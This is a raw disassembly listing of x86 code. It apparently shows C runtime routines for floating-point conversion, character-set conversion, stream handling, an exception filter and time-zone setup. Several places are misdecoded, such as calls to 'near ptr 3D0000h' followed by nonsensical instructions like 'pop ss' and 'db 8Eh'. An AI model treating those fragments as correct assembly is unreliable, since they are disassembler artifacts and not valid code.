loc_4182E7: ; CODE XREF: sub_41827B+56�j
or ah, 1
loc_4182EA: ; CODE XREF: sub_41827B+4E�j
; sub_41827B+62�j ...
and ecx, edi
pop esi
jz short loc_4182FA
cmp ecx, ebp
jnz short loc_4182FF
or eax, 10000h
jmp short loc_4182FF
; ---------------------------------------------------------------------------
loc_4182FA: ; CODE XREF: sub_41827B+72�j
or eax, 20000h
loc_4182FF: ; CODE XREF: sub_41827B+76�j
; sub_41827B+7D�j
pop edi
pop ebp
test bh, 10h
pop ebx
jz short locret_41830C
or eax, 40000h
locret_41830C: ; CODE XREF: sub_41827B+8A�j
retn
sub_41827B endp
; =============== S U B R O U T I N E =======================================
sub_41830D proc near ; CODE XREF: sub_418230+23�p
arg_0 = dword ptr 4
push ebx
mov ebx, [esp+4+arg_0]
xor eax, eax
push esi
test bl, 10h
jz short loc_41831D
push 1
pop eax
loc_41831D: ; CODE XREF: sub_41830D+B�j
test bl, 8
jz short loc_418324
or al, 4
loc_418324: ; CODE XREF: sub_41830D+13�j
test bl, 4
jz short loc_41832B
or al, 8
loc_41832B: ; CODE XREF: sub_41830D+1A�j
test bl, 2
jz short loc_418332
or al, 10h
loc_418332: ; CODE XREF: sub_41830D+21�j
test bl, 1
jz short loc_418339
or al, 20h
loc_418339: ; CODE XREF: sub_41830D+28�j
test ebx, 80000h
jz short loc_418343
or al, 2
loc_418343: ; CODE XREF: sub_41830D+32�j
mov ecx, ebx
mov edx, 300h
and ecx, edx
mov esi, 200h
jz short loc_418370
cmp ecx, 100h
jz short loc_41836D
cmp ecx, esi
jz short loc_418368
cmp ecx, edx
jnz short loc_418370
or ah, 0Ch
jmp short loc_418370
; ---------------------------------------------------------------------------
loc_418368: ; CODE XREF: sub_41830D+50�j
or ah, 8
jmp short loc_418370
; ---------------------------------------------------------------------------
loc_41836D: ; CODE XREF: sub_41830D+4C�j
or ah, 4
loc_418370: ; CODE XREF: sub_41830D+44�j
; sub_41830D+54�j ...
mov ecx, ebx
and ecx, 30000h
jz short loc_418386
cmp ecx, 10000h
jnz short loc_418388
or eax, esi
jmp short loc_418388
; ---------------------------------------------------------------------------
loc_418386: ; CODE XREF: sub_41830D+6B�j
or eax, edx
loc_418388: ; CODE XREF: sub_41830D+73�j
; sub_41830D+77�j
pop esi
test ebx, 40000h
pop ebx
jz short locret_418395
or ah, 10h
locret_418395: ; CODE XREF: sub_41830D+83�j
retn
sub_41830D endp
; =============== S U B R O U T I N E =======================================
sub_418396 proc near ; CODE XREF: sub_418435+48�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push esi
push 20h
cdq
pop ecx
idiv ecx
push 1Fh
mov esi, eax
mov eax, [esp+8+arg_4]
cdq
idiv ecx
pop ecx
mov eax, [esp+4+arg_0]
sub ecx, edx
or edx, 0FFFFFFFFh
shl edx, cl
not edx
test [eax+esi*4], edx
jnz short loc_4183DB
inc esi
cmp esi, 3
jge short loc_4183D6
lea eax, [eax+esi*4]
loc_4183C8: ; CODE XREF: sub_418396+3E�j
cmp dword ptr [eax], 0
jnz short loc_4183DB
inc esi
add eax, 4
cmp esi, 3
jl short loc_4183C8
loc_4183D6: ; CODE XREF: sub_418396+2D�j
push 1
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_4183DB: ; CODE XREF: sub_418396+27�j
; sub_418396+35�j
xor eax, eax
pop esi
retn
sub_418396 endp
; =============== S U B R O U T I N E =======================================
sub_4183DF proc near ; CODE XREF: sub_418435+57�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push ebx
push esi
push edi
push 20h
mov ebx, [esp+10h+arg_0]
cdq
pop ecx
idiv ecx
mov esi, eax
mov eax, [esp+0Ch+arg_4]
cdq
idiv ecx
lea edi, [ebx+esi*4]
push edi
push 1Fh
pop ecx
push 1
pop eax
sub ecx, edx
shl eax, cl
push eax
push dword ptr [edi]
call sub_41973F
add esp, 0Ch
dec esi
js short loc_418431
lea edi, [ebx+esi*4]
loc_418418: ; CODE XREF: sub_4183DF+50�j
test eax, eax
jz short loc_418431
push edi
push 1
push dword ptr [edi]
call sub_41973F
add esp, 0Ch
dec esi
sub edi, 4
test esi, esi
jge short loc_418418
loc_418431: ; CODE XREF: sub_4183DF+34�j
; sub_4183DF+3B�j
pop edi
pop esi
pop ebx
retn
sub_4183DF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418435 proc near ; CODE XREF: sub_418590+81�p
; sub_418590+CC�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_4]
push ebx
push esi
push edi
lea edi, [eax-1]
push 20h
pop ecx
and [ebp+var_4], 0
lea ebx, [edi+1]
push 20h
mov eax, ebx
pop esi
cdq
idiv ecx
push 1Fh
mov ecx, eax
mov eax, ebx
cdq
idiv esi
mov eax, [ebp+arg_0]
pop esi
push 1
mov [ebp+var_8], ecx
lea eax, [eax+ecx*4]
mov [ebp+arg_4], eax
sub esi, edx
pop edx
mov ecx, esi
shl edx, cl
test [eax], edx
jz short loc_418499
inc ebx
push ebx
push [ebp+arg_0]
call sub_418396
pop ecx
test eax, eax
pop ecx
jnz short loc_418496
push edi
push [ebp+arg_0]
call sub_4183DF
pop ecx
mov [ebp+var_4], eax
pop ecx
loc_418496: ; CODE XREF: sub_418435+51�j
mov eax, [ebp+arg_4]
loc_418499: ; CODE XREF: sub_418435+41�j
or edx, 0FFFFFFFFh
mov ecx, esi
shl edx, cl
push 3
pop ecx
and [eax], edx
mov eax, [ebp+var_8]
inc eax
cmp eax, ecx
jge short loc_4184B9
mov edx, [ebp+arg_0]
sub ecx, eax
lea edi, [edx+eax*4]
xor eax, eax
rep stosd
loc_4184B9: ; CODE XREF: sub_418435+76�j
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_418435 endp
; =============== S U B R O U T I N E =======================================
sub_4184C1 proc near ; CODE XREF: sub_418590+75�p
; sub_418590+B6�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov ecx, [esp+arg_0]
push esi
push 3
sub ecx, eax
pop edx
loc_4184CF: ; CODE XREF: sub_4184C1+17�j
mov esi, [eax]
mov [ecx+eax], esi
add eax, 4
dec edx
jnz short loc_4184CF
pop esi
retn
sub_4184C1 endp
; =============== S U B R O U T I N E =======================================
sub_4184DC proc near ; CODE XREF: sub_418590+5F�p
; sub_418590+9E�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
xor eax, eax
stosd
stosd
stosd
pop edi
retn
sub_4184DC endp
; =============== S U B R O U T I N E =======================================
sub_4184E8 proc near ; CODE XREF: sub_418590+4D�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
xor ecx, ecx
loc_4184EE: ; CODE XREF: sub_4184E8+12�j
cmp dword ptr [eax], 0
jnz short loc_418500
inc ecx
add eax, 4
cmp ecx, 3
jl short loc_4184EE
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_418500: ; CODE XREF: sub_4184E8+9�j
xor eax, eax
retn
sub_4184E8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418503 proc near ; CODE XREF: sub_418590+C0�p
; sub_418590+DA�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_4]
push ebx
push esi
push edi
push 20h
mov edi, [ebp+arg_0]
pop ebx
or esi, 0FFFFFFFFh
cdq
mov ecx, ebx
mov [ebp+var_4], 3
idiv ecx
mov [ebp+var_C], eax
mov eax, [ebp+arg_4]
cdq
idiv ecx
and [ebp+arg_4], 0
mov ecx, edx
shl esi, cl
sub ebx, edx
not esi
loc_418539: ; CODE XREF: sub_418503+58�j
mov eax, [edi]
mov ecx, eax
and ecx, esi
mov [ebp+var_8], ecx
mov ecx, edx
shr eax, cl
or eax, [ebp+arg_4]
mov [edi], eax
mov eax, [ebp+var_8]
mov ecx, ebx
add edi, 4
shl eax, cl
dec [ebp+var_4]
mov [ebp+arg_4], eax
jnz short loc_418539
mov edi, [ebp+var_C]
push 2
pop ebx
mov esi, edi
push 8
pop ecx
shl esi, 2
loc_41856B: ; CODE XREF: sub_418503+86�j
cmp ebx, edi
jl short loc_41857E
mov edx, [ebp+arg_0]
mov eax, ecx
sub eax, esi
mov eax, [eax+edx]
mov [ecx+edx], eax
jmp short loc_418585
; ---------------------------------------------------------------------------
loc_41857E: ; CODE XREF: sub_418503+6A�j
mov eax, [ebp+arg_0]
and dword ptr [ecx+eax], 0
loc_418585: ; CODE XREF: sub_418503+79�j
dec ebx
sub ecx, 4
jns short loc_41856B
pop edi
pop esi
pop ebx
leave
retn
sub_418503 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418590 proc near ; CODE XREF: sub_4186FC+D�p
; sub_418712+D�p
var_18 = byte ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
movzx ecx, word ptr [eax+0Ah]
mov ebx, ecx
and ecx, 8000h
mov [ebp+arg_0], ecx
mov ecx, [eax+6]
mov [ebp+var_C], ecx
mov ecx, [eax+2]
movzx eax, word ptr [eax]
mov edi, [ebp+arg_8]
and ebx, 7FFFh
sub ebx, 3FFFh
mov [ebp+var_8], ecx
shl eax, 10h
cmp ebx, 0FFFFC001h
mov [ebp+var_4], eax
jnz short loc_4185FD
lea eax, [ebp+var_C]
xor esi, esi
push eax
call sub_4184E8
test eax, eax
pop ecx
jnz loc_4186BC
lea eax, [ebp+var_C]
push eax
call sub_4184DC
pop ecx
loc_4185F5: ; CODE XREF: sub_418590+E4�j
push 2
loc_4185F7: ; CODE XREF: sub_418590+110�j
pop eax
jmp loc_4186BE
; ---------------------------------------------------------------------------
loc_4185FD: ; CODE XREF: sub_418590+45�j
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_18]
push eax
call sub_4184C1
push dword ptr [edi+8]
lea eax, [ebp+var_C]
push eax
call sub_418435
add esp, 10h
test eax, eax
jz short loc_41861E
inc ebx
loc_41861E: ; CODE XREF: sub_418590+8B�j
mov eax, [edi+4]
mov ecx, eax
sub ecx, [edi+8]
cmp ebx, ecx
jge short loc_418636
lea eax, [ebp+var_C]
push eax
call sub_4184DC
pop ecx
jmp short loc_418672
; ---------------------------------------------------------------------------
loc_418636: ; CODE XREF: sub_418590+98�j
cmp ebx, eax
jg short loc_418679
sub eax, ebx
mov esi, eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_C]
push eax
call sub_4184C1
lea eax, [ebp+var_C]
push esi
push eax
call sub_418503
push dword ptr [edi+8]
lea eax, [ebp+var_C]
push eax
call sub_418435
mov eax, [edi+0Ch]
inc eax
push eax
lea eax, [ebp+var_C]
push eax
call sub_418503
add esp, 20h
loc_418672: ; CODE XREF: sub_418590+A4�j
xor esi, esi
jmp loc_4185F5
; ---------------------------------------------------------------------------
loc_418679: ; CODE XREF: sub_418590+A8�j
cmp ebx, [edi]
jl short loc_4186A5
lea eax, [ebp+var_C]
push eax
call sub_4184DC
push dword ptr [edi+0Ch]
or byte ptr [ebp+var_C+3], 80h
lea eax, [ebp+var_C]
push eax
call sub_418503
mov esi, [edi+14h]
add esp, 0Ch
add esi, [edi]
push 1
jmp loc_4185F7
; ---------------------------------------------------------------------------
loc_4186A5: ; CODE XREF: sub_418590+EB�j
push dword ptr [edi+0Ch]
mov esi, [edi+14h]
and byte ptr [ebp+var_C+3], 7Fh
lea eax, [ebp+var_C]
push eax
add esi, ebx
call sub_418503
pop ecx
pop ecx
loc_4186BC: ; CODE XREF: sub_418590+55�j
xor eax, eax
loc_4186BE: ; CODE XREF: sub_418590+68�j
push 1Fh
pop ecx
sub ecx, [edi+0Ch]
mov edi, [edi+10h]
shl esi, cl
mov ecx, [ebp+arg_0]
neg ecx
sbb ecx, ecx
and ecx, 80000000h
or esi, ecx
or esi, [ebp+var_C]
cmp edi, 40h
jnz short loc_4186ED
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_8]
mov [ecx+4], esi
mov [ecx], edx
jmp short loc_4186F7
; ---------------------------------------------------------------------------
loc_4186ED: ; CODE XREF: sub_418590+14E�j
cmp edi, 20h
jnz short loc_4186F7
mov ecx, [ebp+arg_4]
mov [ecx], esi
loc_4186F7: ; CODE XREF: sub_418590+15B�j
; sub_418590+160�j
pop edi
pop esi
pop ebx
leave
retn
sub_418590 endp
; =============== S U B R O U T I N E =======================================
sub_4186FC proc near ; CODE XREF: sub_418728+23�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push offset dword_42EB10
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_418590
add esp, 0Ch
retn
sub_4186FC endp
; =============== S U B R O U T I N E =======================================
sub_418712 proc near ; CODE XREF: sub_418755+23�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push offset dword_42EB28
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_418590
add esp, 0Ch
retn
sub_418712 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418728 proc near ; CODE XREF: sub_414A2B+12�p
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
xor eax, eax
push eax
push eax
push eax
push eax
push [ebp+arg_4]
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_C]
push eax
call sub_4198E0
push [ebp+arg_0]
lea eax, [ebp+var_C]
push eax
call sub_4186FC
add esp, 24h
leave
retn
sub_418728 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418755 proc near ; CODE XREF: sub_414A2B+2D�p
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
xor eax, eax
push eax
push eax
push eax
push eax
push [ebp+arg_4]
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_C]
push eax
call sub_4198E0
push [ebp+arg_0]
lea eax, [ebp+var_C]
push eax
call sub_418712
add esp, 24h
leave
retn
sub_418755 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418782 proc near ; CODE XREF: sub_414A69+65�p
; sub_414B6D+63�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov edx, [ebp+arg_8]
push ebx
mov ebx, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
mov ecx, [edx+0Ch]
push edi
lea edi, [esi+1]
mov byte ptr [esi], 30h
test ebx, ebx
mov eax, edi
jle short loc_4187BF
mov [ebp+arg_0], ebx
xor ebx, ebx
loc_4187A5: ; CODE XREF: sub_418782+38�j
mov dl, [ecx]
test dl, dl
jz short loc_4187B1
movsx edx, dl
inc ecx
jmp short loc_4187B4
; ---------------------------------------------------------------------------
loc_4187B1: ; CODE XREF: sub_418782+27�j
push 30h
pop edx
loc_4187B4: ; CODE XREF: sub_418782+2D�j
mov [eax], dl
inc eax
dec [ebp+arg_0]
jnz short loc_4187A5
mov edx, [ebp+arg_8]
loc_4187BF: ; CODE XREF: sub_418782+1C�j
and byte ptr [eax], 0
test ebx, ebx
jl short loc_4187D8
cmp byte ptr [ecx], 35h
jl short loc_4187D8
loc_4187CB: ; CODE XREF: sub_418782+52�j
dec eax
cmp byte ptr [eax], 39h
jnz short loc_4187D6
mov byte ptr [eax], 30h
jmp short loc_4187CB
; ---------------------------------------------------------------------------
loc_4187D6: ; CODE XREF: sub_418782+4D�j
inc byte ptr [eax]
loc_4187D8: ; CODE XREF: sub_418782+42�j
; sub_418782+47�j
cmp byte ptr [esi], 31h
jnz short loc_4187E2
inc dword ptr [edx+4]
jmp short loc_4187F4
; ---------------------------------------------------------------------------
loc_4187E2: ; CODE XREF: sub_418782+59�j
push edi
call sub_410B60
inc eax
push eax
push edi
push esi
call sub_4112D0
add esp, 10h
loc_4187F4: ; CODE XREF: sub_418782+5E�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_418782 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4187F9 proc near ; CODE XREF: sub_414A69+3F�p
; sub_414B6D+46�p ...
var_C = byte ptr -0Ch
arg_0 = byte ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
lea eax, [ebp+arg_0]
push edi
push eax
lea eax, [ebp+var_C]
push eax
call sub_41885D
pop ecx
lea esi, [ebp+var_C]
pop ecx
push offset word_45FA10
push 0
push 11h
sub esp, 0Ch
mov edi, esp
movsd
movsd
movsw
call sub_419DB1
mov ds:dword_45FA38, eax
add esp, 18h
movsx eax, ds:byte_45FA12
mov ds:dword_45FA30, eax
pop edi
movsx eax, ds:word_45FA10
mov ds:dword_45FA34, eax
mov ds:dword_45FA3C, offset dword_45FA14
mov eax, offset dword_45FA30
pop esi
leave
retn
sub_4187F9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41885D proc near ; CODE XREF: sub_4187F9+10�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov edx, [ebp+arg_4]
push ebx
push esi
push edi
mov ax, [edx+6]
mov edi, 7FFh
mov ecx, eax
and eax, 8000h
shr ecx, 4
and ecx, edi
mov [ebp+arg_4], eax
mov eax, [edx+4]
mov edx, [edx]
movzx ebx, cx
mov esi, 80000000h
and eax, 0FFFFFh
test ebx, ebx
mov [ebp+var_4], esi
jz short loc_4188AB
cmp ebx, edi
jz short loc_4188A4
lea edi, [ecx+3C00h]
jmp short loc_4188CC
; ---------------------------------------------------------------------------
loc_4188A4: ; CODE XREF: sub_41885D+3D�j
mov edi, 7FFFh
jmp short loc_4188CC
; ---------------------------------------------------------------------------
loc_4188AB: ; CODE XREF: sub_41885D+39�j
xor ebx, ebx
cmp eax, ebx
jnz short loc_4188C3
cmp edx, ebx
jnz short loc_4188C3
mov eax, [ebp+arg_0]
mov [eax+4], ebx
mov [eax], ebx
mov [eax+8], bx
jmp short loc_41890E
; ---------------------------------------------------------------------------
loc_4188C3: ; CODE XREF: sub_41885D+52�j
; sub_41885D+56�j
lea edi, [ecx+3C01h]
mov [ebp+var_4], ebx
loc_4188CC: ; CODE XREF: sub_41885D+45�j
; sub_41885D+4C�j
mov ecx, edx
shr ecx, 15h
shl eax, 0Bh
or ecx, eax
mov eax, [ebp+arg_0]
or ecx, [ebp+var_4]
shl edx, 0Bh
mov [eax+4], ecx
mov [eax], edx
loc_4188E4: ; CODE XREF: sub_41885D+A6�j
test ecx, esi
jnz short loc_418905
mov edx, [eax]
add ecx, ecx
mov ebx, edx
shr ebx, 1Fh
or ebx, ecx
lea ecx, [edx+edx]
mov [eax], ecx
mov [eax+4], ebx
add edi, 0FFFFh
mov ecx, ebx
jmp short loc_4188E4
; ---------------------------------------------------------------------------
loc_418905: ; CODE XREF: sub_41885D+89�j
mov ecx, [ebp+arg_4]
or ecx, edi
mov [eax+8], cx
loc_41890E: ; CODE XREF: sub_41885D+64�j
pop edi
pop esi
pop ebx
leave
retn
sub_41885D endp
; ---------------------------------------------------------------------------
push 2
call sub_412ADE
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41891C: ; DATA XREF: seg000:00418962�o
push esi
mov esi, [esp+8]
mov eax, [esi]
cmp dword ptr [eax], 0E06D7363h
jnz short loc_41893F
cmp dword ptr [eax+10h], 3
jnz short loc_41893F
cmp dword ptr [eax+14h], 19930520h
jnz short loc_41893F
jmp sub_4155EC
; ---------------------------------------------------------------------------
loc_41893F: ; CODE XREF: seg000:00418929�j
; seg000:0041892F�j ...
mov eax, ds:dword_45FA40
test eax, eax
jz short loc_41895C
push eax
call sub_4189B8 ; CODE XREF: sub_4189B8+D�j
test eax, eax
pop ecx
jz short loc_41895C
push esi
call ds:dword_45FA40
jmp short loc_41895E
; ---------------------------------------------------------------------------
loc_41895C: ; CODE XREF: seg000:00418946�j
; seg000:00418951�j
xor eax, eax
loc_41895E: ; CODE XREF: seg000:0041895A�j
pop esi
retn 4
; ---------------------------------------------------------------------------
push offset loc_41891C
call ds:dword_41C024 ; SetUnhandledExceptionFilter
mov ds:dword_45FA40, eax
retn
; ---------------------------------------------------------------------------
push ds:dword_45FA40
call ds:dword_41C024 ; SetUnhandledExceptionFilter
retn
; =============== S U B R O U T I N E =======================================
sub_418980 proc near ; CODE XREF: sub_414E41+6B�p
; sub_415352+61�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push 1
pop esi
push [esp+4+arg_4]
push [esp+8+arg_0]
call near ptr 3D0000h
pop ss
test eax, eax
jz short loc_418998
xor esi, esi
loc_418998: ; CODE XREF: sub_418980+14�j
mov eax, esi
pop esi
retn
sub_418980 endp
; =============== S U B R O U T I N E =======================================
sub_41899C proc near ; CODE XREF: sub_415352+73�p
; sub_415352+BF�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push 1
pop esi
push [esp+4+arg_4]
push [esp+8+arg_0]
call near ptr 3D0000h
sahf
test eax, eax
jz short loc_4189B4
xor esi, esi
loc_4189B4: ; CODE XREF: sub_41899C+14�j
mov eax, esi
pop esi
retn
sub_41899C endp
; =============== S U B R O U T I N E =======================================
sub_4189B8 proc near ; CODE XREF: sub_415352+15B�p
; seg000:00418949�p
arg_0 = dword ptr 4
push esi
push 1
pop esi
push [esp+4+arg_0]
call near ptr 3D0000h
jecxz short near ptr loc_418949+3
sal byte ptr [edx+eax+33h], 0F6h
mov eax, esi
pop esi
retn
sub_4189B8 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4155EC
loc_4189D0: ; CODE XREF: sub_4155EC:loc_41563D�j
push 0Ah
call near ptr sub_417C59
push 16h
call sub_41A044
pop ecx
pop ecx
push 3
call sub_4125D8
; END OF FUNCTION CHUNK FOR sub_4155EC
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4189E7 proc near ; CODE XREF: sub_41578D+6A3�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_4]
xor ebx, ebx
cmp esi, ebx
jz short loc_418A0A
cmp [ebp+arg_8], ebx
jz short loc_418A0A
mov al, [esi]
cmp al, bl
jnz short loc_418A10
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_418A0A
mov [eax], bx
loc_418A0A: ; CODE XREF: sub_4189E7+C�j
; sub_4189E7+11�j ...
xor eax, eax
loc_418A0C: ; CODE XREF: sub_4189E7+42�j
; sub_4189E7+86�j ...
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_418A10: ; CODE XREF: sub_4189E7+17�j
cmp ds:dword_45F8D0, ebx
jnz short loc_418A2B
mov ecx, [ebp+arg_0]
cmp ecx, ebx
jz short loc_418A26
movzx ax, al
mov [ecx], ax
loc_418A26: ; CODE XREF: sub_4189E7+36�j
; sub_4189E7+C0�j
push 1
pop eax
jmp short loc_418A0C
; ---------------------------------------------------------------------------
loc_418A2B: ; CODE XREF: sub_4189E7+2F�j
mov ecx, ds:dword_42E190
movzx eax, al
test byte ptr [ecx+eax*2+1], 80h
jz short loc_418A88
mov eax, ds:dword_42E39C
cmp eax, 1
jle short loc_418A6F
cmp [ebp+arg_8], eax
jl short loc_418A79
xor ecx, ecx
cmp [ebp+arg_0], ebx
setnz cl
push ecx
push [ebp+arg_0]
push eax
push esi
push 9
push ds:dword_45F8E0
call ds:dword_41C120 ; MultiByteToWideChar
test eax, eax
mov eax, ds:dword_42E39C
jnz short loc_418A0C
loc_418A6F: ; CODE XREF: sub_4189E7+5C�j
cmp [ebp+arg_8], eax
jb short loc_418A79
cmp [esi+1], bl
jnz short loc_418A0C
loc_418A79: ; CODE XREF: sub_4189E7+61�j
; sub_4189E7+8B�j ...
mov ds:dword_45F844, 2Ah
or eax, 0FFFFFFFFh
jmp short loc_418A0C
; ---------------------------------------------------------------------------
loc_418A88: ; CODE XREF: sub_4189E7+52�j
xor eax, eax
cmp [ebp+arg_0], ebx
setnz al
push eax
push [ebp+arg_0]
push 1
push esi
push 9
push ds:dword_45F8E0
call ds:dword_41C120 ; MultiByteToWideChar
test eax, eax
jnz loc_418A26
jmp short loc_418A79
sub_4189E7 endp
; =============== S U B R O U T I N E =======================================
sub_418AAF proc near ; CODE XREF: sub_41578D+76�p
; sub_41578D+88�p ...
arg_0 = dword ptr 4
cmp ds:dword_42E39C, 1
jle short loc_418AC6
push 8
push [esp+4+arg_0]
call sub_413446
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_418AC6: ; CODE XREF: sub_418AAF+7�j
mov eax, [esp+arg_0]
mov ecx, ds:dword_42E190
mov al, [ecx+eax*2]
and eax, 8
retn
sub_418AAF endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_418AE0 proc near ; CODE XREF: sub_41578D+797�p
; sub_41578D+7E7�p
cmp cl, 40h
jnb short loc_418AFA
cmp cl, 20h
jnb short loc_418AF0
shld edx, eax, cl
shl eax, cl
retn
; ---------------------------------------------------------------------------
loc_418AF0: ; CODE XREF: sub_418AE0+8�j
mov edx, eax
xor eax, eax
and cl, 1Fh
shl edx, cl
retn
; ---------------------------------------------------------------------------
loc_418AFA: ; CODE XREF: sub_418AE0+3�j
xor eax, eax
xor edx, edx
retn
sub_418AE0 endp
; =============== S U B R O U T I N E =======================================
sub_418AFF proc near ; CODE XREF: sub_416203+F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
cmp ebx, 0FFFFFFFFh
push esi
jz short loc_418B4B
mov esi, [esp+8+arg_4]
mov eax, [esi+0Ch]
test al, 1
jnz short loc_418B1D
test al, 80h
jz short loc_418B4B
test al, 2
jnz short loc_418B4B
loc_418B1D: ; CODE XREF: sub_418AFF+14�j
cmp dword ptr [esi+8], 0
jnz short loc_418B2A
push esi
call sub_417F59
pop ecx
loc_418B2A: ; CODE XREF: sub_418AFF+22�j
mov eax, [esi]
cmp eax, [esi+8]
jnz short loc_418B3A
cmp dword ptr [esi+4], 0
jnz short loc_418B4B
inc eax
mov [esi], eax
loc_418B3A: ; CODE XREF: sub_418AFF+30�j
test byte ptr [esi+0Ch], 40h
jz short loc_418B51
dec dword ptr [esi]
mov eax, [esi]
cmp [eax], bl
jz short loc_418B57
inc eax
mov [esi], eax
loc_418B4B: ; CODE XREF: sub_418AFF+9�j
; sub_418AFF+18�j ...
or eax, 0FFFFFFFFh
loc_418B4E: ; CODE XREF: sub_418AFF+6C�j
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_418B51: ; CODE XREF: sub_418AFF+3F�j
dec dword ptr [esi]
mov eax, [esi]
mov [eax], bl
loc_418B57: ; CODE XREF: sub_418AFF+47�j
mov eax, [esi+0Ch]
inc dword ptr [esi+4]
and al, 0EFh
or al, 1
mov [esi+0Ch], eax
mov eax, ebx
and eax, 0FFh
jmp short loc_418B4E
sub_418AFF endp
; =============== S U B R O U T I N E =======================================
sub_418B6D proc near ; CODE XREF: sub_41623E:loc_41627D�p
cmp ds:dword_45FB00, 0
jnz short locret_418B81
call loc_418B82
inc ds:dword_45FB00
locret_418B81: ; CODE XREF: sub_418B6D+7�j
retn
sub_418B6D endp
; ---------------------------------------------------------------------------
loc_418B82: ; CODE XREF: sub_418B6D+9�p
push ecx
push ebx
push ebp
push esi
push edi
xor ebp, ebp
or ebx, 0FFFFFFFFh
push offset aTz ; "TZ"
xor edi, edi
mov ds:dword_45FA48, ebp
mov ds:dword_42EBE8, ebx
mov ds:dword_42EBD8, ebx
call sub_41A1B6
mov esi, eax
pop ecx
cmp esi, ebp
jnz loc_418CAB
push offset dword_45FA50
call near ptr 3D0000h
; ---------------------------------------------------------------------------
db 8Eh
; ---------------------------------------------------------------------------
cmp eax, ebx
jz loc_418DDA
mov eax, ds:dword_45FA50
mov ecx, ds:dword_45FAA4
imul eax, 3Ch
cmp ds:word_45FA96, bp
push 1
pop edx
mov ds:dword_42EB40, eax
mov ds:dword_45FA48, edx
jz short loc_418BF9
mov esi, ecx
imul esi, 3Ch
add eax, esi
mov ds:dword_42EB40, eax
loc_418BF9: ; CODE XREF: seg000:00418BEB�j
cmp ds:word_45FAEA, bp
jz short loc_418C1D
mov eax, ds:dword_45FAF8
cmp eax, ebp
jz short loc_418C1D
sub eax, ecx
mov ds:dword_42EB44, edx
imul eax, 3Ch
mov ds:dword_42EB48, eax
jmp short loc_418C29
; ---------------------------------------------------------------------------
loc_418C1D: ; CODE XREF: seg000:00418C00�j
; seg000:00418C09�j
mov ds:dword_42EB44, ebp
mov ds:dword_42EB48, ebp
loc_418C29: ; CODE XREF: seg000:00418C1B�j
lea eax, [esp+10h]
mov esi, ds:dword_41C11C
push eax
push ebp
push 3Fh
mov edi, 220h
push ds:dword_42EBCC
push ebx
push offset dword_45FA54
push edi
push ds:dword_45F8E0
call esi ; WideCharToMultiByte
test eax, eax
jz short loc_418C66
cmp [esp+10h], ebp
jnz short loc_418C66
mov eax, ds:dword_42EBCC
and byte ptr [eax+3Fh], 0
jmp short loc_418C6E
; ---------------------------------------------------------------------------
